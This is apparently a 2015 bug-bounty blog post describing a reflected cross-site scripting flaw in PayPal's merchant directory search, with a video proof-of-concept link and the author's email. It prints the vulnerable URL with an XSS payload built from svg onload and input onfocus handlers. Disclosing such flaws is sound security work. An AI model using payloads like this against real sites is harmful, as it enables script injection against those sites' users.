Breaking News

Saturday, 18 April 2015

Reflected Cross Site Scripting at Paypal.com [BugBounty] Writeup by Hamid Ashraf


Hello. Gyz This is Hamid Ashraf (hami hax ).i found a reflected Cross Site Scripting issue on 

the new Paypal Directory service (https://www.paypal.com/directory/merchants)
with 


the following Payload:https://www.paypal.com/directory/merchants?q=&q=509%22%20src= xss 


payload 

https://www.paypal.com/directory/merchants?q=&q=509%22%20src="><svg/onload=prompt(2)>""<input onfocus=alret(2)"autofocus

,


Video POChttp://tune.pk/video/5648557/Reflected-Cross-Site-Scripting-at-Paypalcom-BugBounty

hope you enjoyed! If you have any kind of question please don’t hesitate to ask me, either way here or via email at hamihax@gmail.com
Posted by at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)
Designed By Blogger Templates